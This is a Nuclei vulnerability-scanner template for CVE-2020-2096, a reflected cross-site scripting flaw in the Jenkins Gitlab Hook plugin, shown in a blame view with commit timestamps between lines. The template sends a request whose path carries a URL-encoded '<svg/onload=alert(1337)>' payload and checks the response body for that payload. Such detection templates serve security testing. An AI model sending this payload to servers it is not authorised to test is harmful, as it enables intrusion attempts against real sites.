nuclei-templates/cves/2020/CVE-2020-2096.yaml

21 lines
386 B
YAML
Raw Normal View History

id: cve-2020-2096
2020-04-08 10:59:57 +00:00
info:
name: Jenkins Gitlab Hook XSS
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
2020-04-08 10:59:57 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
matchers-condition: and
2020-04-08 10:59:57 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 14:42:57 +00:00
- type: word
words:
2020-05-25 07:49:06 +00:00
- "<svg/onload=alert(1337)>"
2020-04-08 10:59:57 +00:00
part: body